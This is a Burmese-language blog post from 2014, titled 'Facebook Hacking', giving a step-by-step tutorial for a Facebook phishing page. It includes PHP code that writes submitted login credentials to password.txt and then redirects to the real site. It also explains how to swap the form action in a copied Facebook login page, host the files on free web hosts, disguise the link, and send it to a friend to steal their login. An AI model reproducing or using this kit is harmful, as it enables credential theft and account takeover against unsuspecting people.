ရုိးရုိးေျမေလး မွ လိႈက္လဲစြာၾကိဳဆိုေနပါ၏ ...လာလည္ၾကသူမိတ္ေဆြအေပါင္းေပ်ာ္ရႊင္ခ်မ္းေျမ့ၾကပါေစ.

Pages

Monday, May 26, 2014

Facebook Hacking...

အဆင့္(၁)

ပထမဆံုး notepad ကိုဖြင့္လိုက္ပါ...။
ၿပီးရင္ေအာက္မွာကၽြန္ေတာ္ေရးထားတဲ့ ေကာင္ေလးေတြကို ရိုက္ထည့္လိုက္ပါ..။

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
ရၿပီေနာ္ ရရင္ အဲဒီ ေကာင္ကို phishing.php ဆိုၿပီး Save ထားလိုက္ဗ်ာ...။
အဆင့္(၂)
ၿပီးေတာ့ကၽြန္ေတာ္တို႔ လိုသူငယ္ႏွပ္စား ေလးေတြလုပ္ေနက်အတိုင္း Facebook ရဲ႕ Log in page ကိုသြား
လိုက္ပါ..။ၿပီးရင္ Right Click ေထာက္..။View Page Source ကို သြား ..။ေပၚလာရင္ အားလံုးကို Select All
ေပးၿပီး notepad အသစ္တစ္ခု ထဲ မွာ ကူးထည့္ေပးပါ..။
အဆင့္(၃)
ၿပီးရင္ အဲဒီထဲမွာ Ctrl+F ႏွိပ္ၿပီး action=* ကိုရွာေပးပါ...။ေတြ႔ရင္..။ဒီလိုျဖစ္မယ္ထင္တယ္...။
ဒီလိုျဖစ္မယ္..
action=''https://login.facebook.com/login.php?''
အဲဒီေနရာမွာ..
action=''phishing.php''
လုိ႔ အစားထုိးေပးပါ...။
ရမလား ခင္ဗ်ာ...။
အဆင့္(၄)
ၿပီးရင္ အဲဒီေကာင္ကို facebooklogin.htm/ လုိ႔ေဆ့လိုက္ပါခင္ဗ်ာ..။
အဆင့္(၅)
ၿပီးရင္ notepad ကိုထပ္ဖြင့္ၿပီး Text File အလြတ္တစ္ခုကိုဖန္တီးလိုက္ပါ...။နာမည္က password.txt
ျဖစ္ပါ့မယ္..။
ေနာက္ဆံုးအဆင့္ကေတာ့ အဲဒီ ဖုိင္(၃) ဖိုင္ကို Upload လုပ္မယ့္အဆင့္ပါပဲ...။ ကၽြန္ေတာ္တို႔ အေနနဲ႕
အဲဒီ ဖိုင္သံုးဖိုင္ကို Free web hosting Site တစ္ခုခု မွာ တင္ရပါမယ္...။ဥပမာဘယ္လိုဆိုက္ေတြလဲ
ဆိုရင္
http://www.110mb.com/
http://www.ripway.com/
အဲဒီလို ဆိုက္ေတြပဲျဖစ္ပါတယ္..။ကၽြန္ေတာ္တို႔ နဖူးေတြ႕ဒူးေတြ႕ႀကံဳလိုက္ရတဲ့..Chrome.exe ဟာဆိုရင္
လည္း Ripway က hosting ယူထားတာျဖစ္ပါတယ္...။
ကၽြန္ေတာ္နမူနာ ျပမယ္ဆိုရင္ ..upload တင္ၿပီးတာနဲ႕ သူရဲ႕ URL က ဒီအတိုင္းျဖစ္ပါမယ္..။
http://sitename.110mb.com/facebooklogin.html ျဖစ္ပါ့မယ္..။
ဥပမာ ကၽြန္ေတာ္က heinlinhtun နာမည္နဲ႕ Register လုပ္ထားရင္..
http://heinlinhtun.110mb.com/facebooklogin.html ျဖစ္ပါလိမ့္မယ္...။
ဒါကိုမွ မေက်နပ္ေသးဘူးဆိုရင္ auto redirection URL ထုတ္ေပးတဲ့ ဆိုက္ေတြအမ်ားႀကီးရွိပါတယ္..။
သြားၿပီး ဆင္တူရိုးမွား ပံုစံအတုမ်ားလည္း ျပဳလုပ္လုိ႔ရပါေသးတယ္..။(လုပ္ခုိင္းတာ မဟုတ္ဘူးေနာ္)
အဲဒါၿပီးရင္ေတာ့ အဲဒီ လင့္ခ္ကိုယူ သူငယ္ခ်င္းဆီကိုပို႔ ဟိုဘက္က Log in ၀င္တာနဲ႕...ကြိၿပီပဲေနာ္..။

No comments:

Post a Comment